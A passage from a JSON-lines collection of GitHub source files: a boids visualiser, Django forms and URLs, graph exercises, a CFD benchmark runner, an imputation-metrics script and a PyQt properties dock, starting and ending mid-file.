batch_size: Batch size for the RNN encoders.\n use_eos: If True, append the end-of-sentence word to each input sentence.\n\n Returns:\n thought_vectors: A list of numpy arrays corresponding to 'data'.\n\n Raises:\n ValueError: If called before calling load_encoder.\n \"\"\"\n if not self.encoders:\n raise ValueError(\n \"Must call load_model at least once before calling encode.\")\n\n encoded = []\n for encoder, sess in zip(self.encoders, self.sessions):\n encoded.append(\n np.array(\n encoder.encode(\n sess,\n data,\n use_norm=use_norm,\n verbose=verbose,\n batch_size=batch_size,\n use_eos=use_eos)))\n\n return np.concatenate(encoded, axis=1)\n\n def close(self):\n \"\"\"Closes the active TensorFlow Sessions.\"\"\"\n for sess in self.sessions:\n sess.close()\n","repo_name":"lajanugen/S2V","sub_path":"src/encoder_manager.py","file_name":"encoder_manager.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"16"} +{"seq_id":"7130006501","text":"#!/usr/bin/env python3\n\n\"\"\"\nScript to produce visualisation of boid movement from dumped position data\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport configparser, csv, numpy as np, os, sys\n\nfrom fast_boids import quick_norm\n\nfrom boids import *\n\nif len(sys.argv) < 2:\n path = '.'\nelse:\n path = sys.argv[1]\n\nconfig = configparser.ConfigParser()\nif os.path.isdir(path):\n config.read(os.path.join(path, 'config.ini'))\n config['DEFAULT']['data_dir'] = os.path.abspath(path)\nelse:\n config.read(path)\n config['DEFAULT']['data_dir'] = os.path.abspath(os.path.dirname(path))\n\nWORLD_RADIUS = eval(config['DEFAULT']['world_radius'])\nDUMP_STATS_INTERVAL = eval(config['DEFAULT']['dump_stats_interval'])\nDT = eval(config['DEFAULT']['dt'])\n\nPREY_RADIUS = eval(config['Prey']['boid_radius'])\nPREDATOR_RADIUS = eval(config['Predator']['boid_radius'])\n\nFRAME_INTERVAL = eval(config['Visualisation']['frame_interval'])\nEVERY_NTH_FRAME = eval(config['Visualisation']['every_nth_frame'])\nSTART_AT_T = eval(config['Visualisation']['start_at_t'])\nSTOP_AT_T = eval(config['Visualisation']['stop_at_t'])\n\nDATA_DIR = config['DEFAULT']['data_dir']\n\nPLOT_MINIMUM = -1.01*WORLD_RADIUS\nPLOT_MAXIMUM = 1.01*WORLD_RADIUS\n\nfeeding_area_helper = FeedingAreaConfigurations()\nfeeding_area_config = eval(config['DEFAULT']['feeding_areas'])\nif isinstance(feeding_area_config, tuple):\n FEEDING_AREA_LOCATIONS, FEEDING_AREA_RADIUS = feeding_area_config\nelse:\n FEEDING_AREA_LOCATIONS, FEEDING_AREA_RADIUS = feeding_area_helper.get_info(\n feeding_area_config)\n\ndef animate(i, fig, ax, text,\n prey_graph, prey_quivers,\n predator_graph, predator_quivers,\n prey_pos_data, prey_vel_data,\n predator_pos_data, predator_vel_data):\n text.set_text(\"t = %d\" % (i*(DUMP_STATS_INTERVAL*DT*EVERY_NTH_FRAME)\n + START_AT_T))\n u = [u[0]/quick_norm(np.array(u)) for u in prey_vel_data[i]]\n v = [u[1]/quick_norm(np.array(u)) for u in prey_vel_data[i]]\n prey_quivers.set_offsets(prey_pos_data[i])\n prey_quivers.set_UVC(u, v)\n prey_graph.set_offsets(prey_pos_data[i])\n u = [u[0]/quick_norm(np.array(u)) for u in predator_vel_data[i]]\n v = [u[1]/quick_norm(np.array(u)) for u in predator_vel_data[i]]\n predator_quivers.set_offsets(predator_pos_data[i])\n predator_quivers.set_UVC(u, v)\n predator_graph.set_offsets(predator_pos_data[i])\n return [text, prey_graph, predator_graph]\n\ndef collect_data(csv_reader):\n frame_data = []\n i = 0\n for row in csv_reader:\n if i % EVERY_NTH_FRAME:\n i += 1\n continue\n if i*DUMP_STATS_INTERVAL*DT < START_AT_T:\n i += 1\n continue\n if i*DUMP_STATS_INTERVAL*DT > STOP_AT_T:\n break\n positions = np.array(list(map(lambda x: float(x), row)))\n num_boids = positions.size / 2\n positions = positions.reshape(num_boids, 2)\n data = []\n for boid in positions:\n data.append((boid[0], boid[1]))\n frame_data.append(data)\n i += 1\n return frame_data\n\nprey_pos_reader = csv.reader(open(os.path.join(DATA_DIR, 'prey_positions.csv')))\nprey_vel_reader = csv.reader(open(os.path.join(DATA_DIR, 'prey_velocities.csv')))\npredator_pos_reader = csv.reader(open(os.path.join(DATA_DIR, 'predator_positions.csv')))\npredator_vel_reader = csv.reader(open(os.path.join(DATA_DIR, 'predator_velocities.csv')))\n\nprey_pos_data = collect_data(prey_pos_reader)\nprey_vel_data = collect_data(prey_vel_reader)\npredator_pos_data = collect_data(predator_pos_reader)\npredator_vel_data = collect_data(predator_vel_reader)\n\nfig, ax = plt.subplots()\nboundary = plt.Circle((0, 0), WORLD_RADIUS, facecolor='none',\n linestyle='dashed')\nax.add_artist(boundary)\n\nfor location in FEEDING_AREA_LOCATIONS:\n feeding_plot = plt.Circle(tuple(location), FEEDING_AREA_RADIUS, facecolor='green', linestyle='dashed', alpha=0.3)\n ax.add_artist(feeding_plot)\n\ntext = ax.text(PLOT_MINIMUM+5, PLOT_MAXIMUM-20, \"\", withdash=True, fontsize=12)\n\nprey_graph = ax.scatter(100*PLOT_MINIMUM, 100*PLOT_MAXIMUM,\n 1.2*np.pi*PREY_RADIUS**2, facecolor='white', alpha=0.8,\n edgecolor='black', linewidth=1)\nprey_quivers = ax.quiver([], [], width=0.5, units='dots', scale=0.08)\npredator_graph = ax.scatter(100*PLOT_MINIMUM, 100*PLOT_MAXIMUM,\n 1.2*np.pi*PREDATOR_RADIUS**2, facecolor='red', alpha=0.8,\n edgecolor='black', linewidth=1)\npredator_quivers = ax.quiver([], [], width=0.5, units='dots', scale=0.08)\nax.set_xlim(PLOT_MINIMUM, PLOT_MAXIMUM)\nax.set_ylim(PLOT_MINIMUM, PLOT_MAXIMUM)\n\nani = animation.FuncAnimation(fig, animate, len(prey_pos_data),\n fargs=(fig, ax, text,\n prey_graph, prey_quivers,\n predator_graph, predator_quivers,\n prey_pos_data, prey_vel_data,\n predator_pos_data, predator_vel_data),\n interval=FRAME_INTERVAL,\n repeat=True)\nplt.show()\n\n","repo_name":"tsmithe/adaptive-boids","sub_path":"visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12036601375","text":"from django import forms\nfrom .models import Blog\n\n\nclass BlogForm(forms.ModelForm):\n class Meta:\n model = Blog\n fields = ('title', 'description', 'blog_pic')\n widgets = {\n\n 'title': forms.TextInput(attrs={'class': 'form-control row mb-3', 'placeholder': 'Title'}),\n 'description': forms.TextInput(attrs={'class': 'form-control row mb-3', 'placeholder': 'Description'})\n\n\n }\n\n labels = {\"title\": \"Title\", \"description\": \"Description\",\n 'blog_pic': 'Profile Picture'}\n","repo_name":"FatihG34/Second_Django_Project","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38098136446","text":"from django.conf.urls import patterns, include, url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.utils.translation import ugettext_lazy as _\nfrom sitemaps import ViewSitemap\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nsitemaps = {\n 'views_sitemap': ViewSitemap,\n}\n\nurlpatterns = patterns('',\n# url(r'^404$', 'info.views.page_not_found', name='page_not_found'),\n # Translation\n (r'^i18n/', include('django.conf.urls.i18n')),\n (r'^sitemap\\.xml$', 'django.contrib.sitemaps.views.sitemap', {\n 'sitemaps': sitemaps,\n 'template_name': 'info/custom_sitemap.html'},),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n # Albums\n url(_(r'^albums$'), 'info.views.albums', name='albums'),\n\n # Facebook all auth\n (r'^accounts/', include('allauth.urls')),\n\n)\n\nurlpatterns += i18n_patterns('',\n url(_(r'^$'), 'info.views.home', name='home'),\n url(_(r'^bicycle-touring$'), 'info.views.bicycle_touring', name='bicycle-touring'),\n url(_(r'^boom-festival$'), 'info.views.boom_festival', name='boom-festival'),\n url(_(r'^boom-and-bike$'), 'info.views.boom_and_bike', name='boom-and-bike'),\n url(_(r'^get-there$'), 'info.views.get_there', name='get-there'),\n url(_(r'^together$'), 'info.views.together', name='together'),\n url(_(r'^get-there$'), 'info.views.get_there', name='get-there'),\n url(_(r'^city_visit/(?P<location>.+)$'), 'info.views.city_visit', name='city_visit'),\n url(_(r'^user_checkpoints/(?P<id>[0-9]+)$'), 'info.views.user_checkpoints', name='user_checkpoints'),\n)\n\n#urlpatterns += patterns('django.contrib.auth.views',\n# (_(r'^accounts/login/$'), 'login'),\n# (_(r'^accounts/logout/$'), 'logout'),\n#)\n\nhandler404 = 'info.views.page_not_found'\n","repo_name":"qcaron/boombike","sub_path":"boombike/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71742442889","text":"def find(parent, x):\n if parent[x] != x:\n parent[x] = find(parent, parent[x])\n return parent[x]\n\n\ndef union(parent, a, b):\n a = find(parent, a)\n b = find(parent, b)\n\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\nn ,m = map(int, input().split())\noperations = []\nparent = [i for i in range(m+1)]\n\nfor _ in range(m):\n oper, a, b = map(int, input().split())\n operations.append((oper, a, b))\n\n\nfor operation in operations:\n oper, a, b = operation\n if oper == 0:\n union(parent, a, b)\n if oper == 1:\n if find(parent, a) == find(parent, b):\n print(\"YES\")\n else:\n print(\"NO\")\n \n\n# 7 8\n# 0 1 3\n# 1 1 7\n# 0 7 6\n# 1 7 1\n# 0 3 7\n# 0 4 2\n# 0 1 1\n# 1 1 1","repo_name":"rbgksqkr/TIL","sub_path":"이코테/8. 그래프/ex_make_team.py","file_name":"ex_make_team.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29910852538","text":"import argparse\n\nimport pandas as pd\nimport os\nimport subprocess\n\n\ndef run_one_run(mesh_size: int):\n bin_file = os.path.dirname(os.path.abspath(__file__)) + \"/../bin/cfdARCO\"\n\n time_microseconds_cudas = []\n time_microseconds_parallels = []\n\n for q in range(5):\n command_cuda = [bin_file, \"-L\", str(mesh_size), \"-d\", \"ln\", \"-t\", \"300\", \"-c\"]\n result_cuda = subprocess.run(command_cuda, capture_output=True, text=True)\n outs_cuda = result_cuda.stdout\n\n time_str_cuda = outs_cuda.split(\"\\n\")[-2].split(\" \")[-1].split(\"[\")[0]\n time_microseconds_cuda = int(time_str_cuda)\n time_microseconds_cudas.append(time_microseconds_cuda)\n\n for q in range(5):\n # command_parallel = [\"mpirun\", \"-n\", \"8\", bin_file, \"--skip_history\", \"-L\", str(mesh_size), \"-d\", \"ln\", \"-t\", \"300\"]\n # result_parallel = subprocess.run(command_parallel, capture_output=True, text=True)\n # outs_parallel = result_parallel.stdout\n\n # time_str_parallel = outs_parallel.split(\"\\n\")[-2].split(\" \")[-1].split(\"[\")[0]\n # time_microseconds_parallel = int(time_str_parallel)\n # time_microseconds_parallels.append(time_microseconds_parallel)\n time_microseconds_parallels.append(0)\n\n # print(f\"Res(mesh_size={mesh_size}) = cuda - {min(time_microseconds_cudas)} parallel - {min(time_microseconds_parallels)}\")\n print(f\"Res(mesh_size={mesh_size}) = cuda - {min(time_microseconds_cudas)} parallel - \")\n\n return time_microseconds_cudas, time_microseconds_parallels\n\n\ndef generate_report(mesh_sizes, output_file=\"report_cuda.csv\"):\n times_microseconds_cuda = []\n times_microseconds_parallel = []\n mesh_sizes_df = []\n for mesh_size in mesh_sizes:\n time_cur_cudas, time_cur_parallels = run_one_run(mesh_size)\n for time_cur_cuda, time_cur_parallel in zip(time_cur_cudas, time_cur_parallels):\n mesh_sizes_df.append(mesh_size)\n times_microseconds_cuda.append(time_cur_cuda)\n times_microseconds_parallel.append(time_cur_parallel)\n print(time_cur_cuda, time_cur_parallel)\n\n df_dict = {\"mesh_sizes\": mesh_sizes_df, \"times_microseconds_cuda\": times_microseconds_cuda,\n \"times_microseconds_parallel\": times_microseconds_parallel}\n df = pd.DataFrame(df_dict)\n df.to_csv(output_file)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='cfdARCHO bench')\n parser.add_argument('-mf', '--mesh_size_from', required=False, type=int)\n parser.add_argument('-mt', '--mesh_size_to', required=False, type=int)\n parser.add_argument('-ms', '--mesh_size_step', required=False, type=int)\n parser.add_argument('-m', '--meshes', required=False, nargs='+', type=int)\n parser.add_argument('-o', '--out_file', required=False, default=\"report_cuda_history.csv\")\n\n args = parser.parse_args()\n\n if args.meshes is None:\n mesh_sizes = range(args.mesh_size_from, args.mesh_size_to, args.mesh_size_step)\n else:\n mesh_sizes = args.meshes\n generate_report(list(mesh_sizes), args.out_file)\n\n","repo_name":"yewhenp/cfdARCO","sub_path":"cfdARCO/scripts/test_cuda_execution.py","file_name":"test_cuda_execution.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19487024432","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport pathlib\n\nfrom utils.utils import rmse_loss, get_bins_from_numerical\nfrom evaluation.performance_metric import marginal_estimands, bivariate_estimands, house_bins\n\n# Load data\nmodel_names = [\"cart\", \"rf\", \"gain\", \"mida\"]\nnum_samples = 100\nnum_imputations = 10\n\nsave_name = \"house\"\nmiss_mechanism = \"MCAR\"\nfile_name = '../data/house_recoded.csv'\ndata_df = pd.read_csv(file_name)\ndata_x = data_df.values.astype(np.float32)\n\nnum_index = list(range(-8, 0))\ncat_index = list(range(-data_df.shape[1], -8))\n\n# Parameters\nno, dim = data_x.shape\n\n# seperate categorical variables and numerical variables\nif cat_index:\n data_cat_pop_df = data_df.iloc[:, cat_index]\n # get all possible levels for categorical variable\n all_levels = [np.unique(x) for x in data_x[:, cat_index].T]\n all_levels_dict = dict(zip(data_df.columns[cat_index], all_levels))\n # population estimands\n mar_Q, mar_Q_var = marginal_estimands(data_cat_pop_df, all_levels_dict)\n biv_Q, biv_Q_var = bivariate_estimands(data_cat_pop_df, all_levels_dict)\n # qualified index\n mar_index = (mar_Q * no > 10) & ((1 - mar_Q) * no > 10)\n biv_index = (biv_Q * no > 10) & ((1 - biv_Q) * no > 10)\n # performance metrics\n mar_qhat = np.empty(shape=(mar_Q.shape[0], num_samples))\n mar_qhat_var = np.empty(shape=(mar_Q_var.shape[0], num_samples))\n biv_qhat = np.empty(shape=(biv_Q.shape[0], num_samples))\n biv_qhat_var = np.empty(shape=(biv_Q_var.shape[0], num_samples))\n # initial imputed metrics\n mar_prob_impute = {}\n mar_var_impute = {}\n biv_prob_impute = {}\n biv_var_impute = {}\n\n\nif num_index:\n data_num_pop_df = data_df.iloc[:, num_index]\n if save_name != \"house2\":\n data_bin_pop_ls, bins = zip(*data_num_pop_df.apply(pd.qcut, 0, q=8, labels = False, retbins=True, duplicates=\"drop\"))\n data_bin_pop_df = pd.concat(data_bin_pop_ls, axis=1)\n else:\n bins = house_bins\n data_bin_pop_df = get_bins_from_numerical(data_num_pop_df, house_bins)\n # get all possible levels\n bin_all_levels = [np.unique(x) for x in data_bin_pop_df.values.T]\n bin_all_levels_dict = dict(zip(data_df.columns[num_index], bin_all_levels))\n # population estimands\n mar_bin_Q, mar_bin_Q_var = marginal_estimands(data_bin_pop_df, bin_all_levels_dict)\n biv_bin_Q, biv_bin_Q_var = bivariate_estimands(data_bin_pop_df, bin_all_levels_dict)\n # qualified index\n mar_bin_index = (mar_bin_Q * no > 10) & ((1 - mar_bin_Q) * no > 10)\n biv_bin_index = (biv_bin_Q * no > 10) & ((1 - biv_bin_Q) * no > 10)\n # performance metrics\n mar_bin_qhat = np.empty(shape=(mar_bin_Q.shape[0], num_samples))\n mar_bin_qhat_var = np.empty(shape=(mar_bin_Q_var.shape[0], num_samples))\n biv_bin_qhat = np.empty(shape=(biv_bin_Q.shape[0], num_samples))\n biv_bin_qhat_var = np.empty(shape=(biv_bin_Q_var.shape[0], num_samples))\n # initial imputed metrics\n mar_bin_prob_impute = {}\n mar_bin_var_impute = {}\n biv_bin_prob_impute = {}\n biv_bin_var_impute = {}\n\nmse = {}\n\nfor model_name in model_names:\n if cat_index:\n mar_prob_impute[model_name] = np.empty(shape=(mar_Q.shape[0], num_samples, num_imputations))\n mar_var_impute[model_name] = np.empty(shape=(mar_Q_var.shape[0], num_samples, num_imputations))\n biv_prob_impute[model_name] = np.empty(shape=(biv_Q.shape[0], num_samples, num_imputations))\n biv_var_impute[model_name] = np.empty(shape=(biv_Q_var.shape[0], num_samples, num_imputations))\n if num_index:\n mar_bin_prob_impute[model_name] = np.empty(shape=(mar_bin_Q.shape[0], num_samples, num_imputations))\n mar_bin_var_impute[model_name] = np.empty(shape=(mar_bin_Q_var.shape[0], num_samples, num_imputations))\n biv_bin_prob_impute[model_name] = np.empty(shape=(biv_bin_Q.shape[0], num_samples, num_imputations))\n biv_bin_var_impute[model_name] = np.empty(shape=(biv_bin_Q_var.shape[0], num_samples, num_imputations))\n\n # acc[model_name] = []\n mse[model_name] = []\n\nfor i in range(num_samples):\n # load samples\n data_i = np.loadtxt('../samples/{}/complete/sample_{}.csv'.format(save_name, i),\n delimiter=\",\").astype(np.float32)\n data_miss_i = np.loadtxt('../samples/{}/{}/sample_{}.csv'.format(save_name, miss_mechanism, i),\n delimiter=\",\").astype(np.float32)\n data_m = 1 - np.isnan(data_miss_i).astype(np.float32)\n # seperate categorical variables and numerical variables\n if cat_index:\n data_cat = data_i[:, cat_index]\n data_m_cat = data_m[:, cat_index]\n data_cat_df = pd.DataFrame(data=data_cat,\n index=list(range(data_cat.shape[0])),\n columns=data_df.columns[cat_index])\n # marginal prob and bivariate prob before introduce missingness\n mar_qhat[:, i], mar_qhat_var[:, i] = marginal_estimands(data_cat_df, all_levels_dict)\n biv_qhat[:, i], biv_qhat_var[:, i] = bivariate_estimands(data_cat_df, all_levels_dict)\n if num_index:\n data_num = data_i[:, num_index]\n data_m_num = data_m[:, num_index]\n data_num_df = pd.DataFrame(data=data_num,\n index=list(range(data_num.shape[0])),\n columns=data_df.columns[num_index])\n data_bin_df = get_bins_from_numerical(data_num_df, bins)\n # marginal prob and bivariate prob before introduce missingness\n mar_bin_qhat[:, i], mar_bin_qhat_var[:, i] = marginal_estimands(data_bin_df, bin_all_levels_dict)\n biv_bin_qhat[:, i], biv_bin_qhat_var[:, i] = bivariate_estimands(data_bin_df, bin_all_levels_dict)\n\n for model_name in model_names:\n print(\"{}th sample, model: {}\".format(i, model_name))\n for l in range(num_imputations):\n # loading imputations\n if model_name == \"gain\" or model_name == \"mida\":\n data_imputed = np.loadtxt('../results/{}/{}/{}/imputed_{}_{}.csv'.format(save_name, miss_mechanism, model_name, i, l),delimiter=\",\").astype (np.float32)\n if model_name == \"cart\" or model_name ==\"rf\":\n data_imputed = pd.read_csv('../results/{}/{}/{}/imputed_{}_{}.csv'.format(save_name, miss_mechanism, model_name, i, l)).values.astype(np.float32)\n # report accuracy\n mse[model_name].append(rmse_loss(data_i, data_imputed, data_m))\n # seperate categorical variables an d numerical variables\n if cat_index:\n imputed_cat = data_imputed[:, cat_index]\n imputed_cat_df = pd.DataFrame(data=imputed_cat,\n index=list(range(imputed_cat.shape[0])),\n columns=data_df.columns[cat_index])\n # get imputed marginal prob and biviate prob for ith sample\n mar_prob_impute[model_name][:, i, l], mar_var_impute[model_name][:, i, l] = marginal_estimands(\n imputed_cat_df, all_levels_dict)\n biv_prob_impute[model_name][:, i, l], biv_var_impute[model_name][:, i, l] = bivariate_estimands(\n imputed_cat_df, all_levels_dict)\n if num_index:\n imputed_num = data_imputed[:, num_index]\n imputed_num_df = pd.DataFrame(data=imputed_num,\n index=list(range(imputed_num.shape[0])),\n columns=data_df.columns[num_index])\n imputed_bin_df = get_bins_from_numerical(imputed_num_df, bins)\n # get imputed marginal prob and biviate prob for ith sample\n mar_bin_prob_impute[model_name][:, i, l], mar_bin_var_impute[model_name][:, i, l] = marginal_estimands(imputed_bin_df, bin_all_levels_dict)\n biv_bin_prob_impute[model_name][:, i, l], biv_bin_var_impute[model_name][:, i, l] = bivariate_estimands(imputed_bin_df, bin_all_levels_dict)\n pass\n pass\n pass\n\n# save estimands\nsave_path = \"../metrics/{}/{}\".format(save_name, miss_mechanism)\npathlib.Path(save_path).mkdir(parents=True, exist_ok=True)\nif cat_index:\n # population estimands\n np.save(os.path.join(save_path, \"mar_Q\"), mar_Q)\n np.save(os.path.join(save_path, \"mar_Q_var\"), mar_Q_var)\n np.save(os.path.join(save_path, \"biv_Q\"), biv_Q)\n np.save(os.path.join(save_path, \"biv_Q_var\"), biv_Q_var)\n # premiss estimands\n np.save(os.path.join(save_path, \"mar_qhat\"), mar_qhat)\n np.save(os.path.join(save_path, \"mar_qhat_var\"), mar_qhat_var)\n np.save(os.path.join(save_path, \"biv_qhat\"), biv_qhat)\n np.save(os.path.join(save_path, \"biv_qhat_var\"), biv_qhat_var)\n # imputed estimands\n np.save(os.path.join(save_path, \"mar_prob_impute\"), mar_prob_impute)\n np.save(os.path.join(save_path, \"mar_var_impute\"), mar_var_impute)\n np.save(os.path.join(save_path, \"biv_prob_impute\"), biv_prob_impute)\n np.save(os.path.join(save_path, \"biv_var_impute\"), biv_var_impute)\nif num_index:\n # population estimands\n np.save(os.path.join(save_path, \"mar_bin_Q\"), mar_bin_Q)\n np.save(os.path.join(save_path, \"mar_bin_Q_var\"), mar_bin_Q_var)\n np.save(os.path.join(save_path, \"biv_bin_Q\"), biv_bin_Q)\n np.save(os.path.join(save_path, \"biv_bin_Q_var\"), biv_bin_Q_var)\n # performance metrics\n np.save(os.path.join(save_path, \"mar_bin_qhat\"), mar_bin_qhat)\n np.save(os.path.join(save_path, \"mar_bin_qhat_var\"), mar_bin_qhat_var)\n np.save(os.path.join(save_path, \"biv_bin_qhat\"), biv_bin_qhat)\n np.save(os.path.join(save_path, \"biv_bin_qhat_var\"), biv_bin_qhat_var)\n # initial imputed metrics\n np.save(os.path.join(save_path, \"mar_bin_prob_impute\"), mar_bin_prob_impute)\n np.save(os.path.join(save_path, \"mar_bin_var_impute\"), mar_bin_var_impute)\n np.save(os.path.join(save_path, \"biv_bin_prob_impute\"), biv_bin_prob_impute)\n np.save(os.path.join(save_path, \"biv_bin_var_impute\"), biv_bin_var_impute)\n\nnp.save(os.path.join(save_path, \"mse\"), mse)","repo_name":"zhenhua-wang/MissingData_DL","sub_path":"evaluation/calculate_estimands.py","file_name":"calculate_estimands.py","file_ext":"py","file_size_in_byte":10153,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"33043266078","text":"import sys\r\nsys.setrecursionlimit(10000)\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\nroot = [[] for _ in range(n+1)]\r\nvisited = [False for _ in range(n+1)]\r\ncount = 0\r\n\r\n\r\nfor _ in range(m):\r\n u, v = map(int, input().split())\r\n \r\n root[u].append(v)\r\n root[v].append(u)\r\n \r\n\r\n\r\ndef DFS(now):\r\n visited[now] = True\r\n for i in root[now]:\r\n if not visited[i]:\r\n DFS(i)\r\n \r\nfor i in range(1, n+1):\r\n if not visited[i]:\r\n count += 1\r\n DFS(i)\r\n \r\nprint(count)\r\n \r\n\r\n","repo_name":"MiniMini-On/Algorithm","sub_path":"백준/Silver/11724. 연결 요소의 개수/연결 요소의 개수.py","file_name":"연결 요소의 개수.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37866282748","text":"from utils import Utils\nfrom object import Object\nfrom pyqtcore import QString\nfrom propertybrowser import PropertyBrowser\nfrom documentmanager import DocumentManager\nfrom changeproperties import SetProperty, RemoveProperty, RenameProperty\nfrom PyQt5.QtCore import (\n Qt,\n QSize,\n QEvent\n)\nfrom PyQt5.QtGui import (\n QIcon,\n QKeySequence\n)\nfrom PyQt5.QtWidgets import (\n QWidget,\n QVBoxLayout,\n QToolBar,\n QLineEdit, \n QInputDialog,\n QAction,\n QDockWidget\n)\ndef isExternal(object):\n if (not object):\n return False\n x = object.typeId()\n if x==Object.TilesetType:\n return object.isExternal()\n elif x==Object.TileType:\n return object.tileset().isExternal()\n elif x==Object.TerrainType:\n return object.tileset().isExternal()\n else:\n return False\n\nclass PropertiesDock(QDockWidget):\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.mMapDocument = None\n self.mPropertyBrowser = PropertyBrowser()\n\n self.setObjectName(\"propertiesDock\")\n self.mActionAddProperty = QAction(self)\n self.mActionAddProperty.setEnabled(False)\n self.mActionAddProperty.setIcon(QIcon(\":/images/16x16/add.png\"))\n self.mActionAddProperty.triggered.connect(self.addProperty)\n self.mActionRemoveProperty = QAction(self)\n self.mActionRemoveProperty.setEnabled(False)\n self.mActionRemoveProperty.setIcon(QIcon(\":/images/16x16/remove.png\"))\n self.mActionRemoveProperty.triggered.connect(self.removeProperty)\n self.mActionRenameProperty = QAction(self)\n self.mActionRenameProperty.setEnabled(False)\n self.mActionRenameProperty.setIcon(QIcon(\":/images/16x16/rename.png\"))\n self.mActionRenameProperty.triggered.connect(self.renameProperty)\n Utils.setThemeIcon(self.mActionAddProperty, \"add\")\n Utils.setThemeIcon(self.mActionRemoveProperty, \"remove\")\n Utils.setThemeIcon(self.mActionRenameProperty, \"rename\")\n toolBar = QToolBar()\n toolBar.setFloatable(False)\n toolBar.setMovable(False)\n toolBar.setIconSize(QSize(16, 16))\n toolBar.addAction(self.mActionAddProperty)\n toolBar.addAction(self.mActionRemoveProperty)\n toolBar.addAction(self.mActionRenameProperty)\n widget = QWidget(self)\n layout = QVBoxLayout(widget)\n layout.setContentsMargins(5, 5, 5, 5)\n layout.setSpacing(0)\n layout.addWidget(self.mPropertyBrowser)\n layout.addWidget(toolBar)\n widget.setLayout(layout)\n self.setWidget(widget)\n manager = DocumentManager.instance()\n manager.currentDocumentChanged.connect(self.mapDocumentChanged)\n self.mPropertyBrowser.currentItemChangedSignal.connect(self.currentItemChanged)\n self.retranslateUi()\n\n def bringToFront(self):\n self.show()\n self.raise_()\n self.mPropertyBrowser.setFocus()\n\n def event(self, event):\n x = event.type()\n if x==QEvent.KeyPress or x==QEvent.ShortcutOverride:\n keyEvent = event\n if (keyEvent.matches(QKeySequence.Delete) or keyEvent.key() == Qt.Key_Backspace):\n if event.type() == QEvent.KeyPress:\n self.removeProperty()\n event.accept()\n return True\n elif x==QEvent.LanguageChange:\n self.retranslateUi()\n else:\n pass\n\n return super().event(event)\n\n def mapDocumentChanged(self, mapDocument):\n if type(mapDocument)==list:\n mapDocument = mapDocument[0]\n if (self.mMapDocument):\n self.mMapDocument.disconnect()\n self.mMapDocument = mapDocument\n self.mPropertyBrowser.setMapDocument(mapDocument)\n if (mapDocument):\n mapDocument.currentObjectChanged.connect(self.currentObjectChanged)\n mapDocument.tilesetFileNameChanged.connect(self.tilesetFileNameChanged)\n mapDocument.editCurrentObject.connect(self.bringToFront)\n self.currentObjectChanged(mapDocument.currentObject())\n else:\n self.currentObjectChanged(None)\n\n def currentObjectChanged(self, object):\n if type(object)==list and len(object)>0:\n object = object[0]\n self.mPropertyBrowser.setObject(object)\n enabled = object != None and not isExternal(object)\n self.mPropertyBrowser.setEnabled(enabled)\n self.mActionAddProperty.setEnabled(enabled)\n\n def currentItemChanged(self, item):\n isCustomProperty = self.mPropertyBrowser.isCustomPropertyItem(item)\n external = isExternal(self.mPropertyBrowser.object())\n self.mActionRemoveProperty.setEnabled(isCustomProperty and not external)\n self.mActionRenameProperty.setEnabled(isCustomProperty and not external)\n\n def tilesetFileNameChanged(self, tileset):\n object = self.mMapDocument.currentObject()\n if (not object):\n return\n update = False\n x = object.typeId()\n if x==Object.TilesetType:\n update = object == tileset\n elif x==Object.TileType:\n update = object.tileset() == tileset\n elif x==Object.TerrainType:\n update = object.tileset() == tileset\n else:\n pass\n\n if (update):\n self.currentObjectChanged(object)\n self.currentItemChanged(self.mPropertyBrowser.currentItem())\n\n def addProperty(self, *args):\n l = len(args)\n if l==0:\n property, ok = QInputDialog.getText(self.mPropertyBrowser, self.tr(\"Add Property\"),\n self.tr(\"Name:\"), QLineEdit.Normal,'')\n if ok:\n self.addProperty(property)\n elif l==1:\n arg1 = args[0]\n tp = type(arg1)\n if tp==bool:\n self.addProperty()\n elif tp in [str, QString]:\n name = arg1\n if name=='':\n return\n object = self.mMapDocument.currentObject()\n if (not object):\n return\n if (not object.hasProperty(name)):\n undoStack = self.mMapDocument.undoStack()\n undoStack.push(SetProperty(self.mMapDocument, self.mMapDocument.currentObjects(), name, QString()))\n\n self.mPropertyBrowser.editCustomProperty(name)\n\n def removeProperty(self):\n item = self.mPropertyBrowser.currentItem()\n object = self.mMapDocument.currentObject()\n if (not item or not object):\n return\n name = item.property().propertyName()\n undoStack = self.mMapDocument.undoStack()\n items = item.parent().children()\n if items.count() > 1:\n currentItemIndex = items.indexOf(item)\n if item == items.last():\n self.mPropertyBrowser.setCurrentItem(items.at(currentItemIndex - 1))\n else:\n self.mPropertyBrowser.setCurrentItem(items.at(currentItemIndex + 1))\n\n 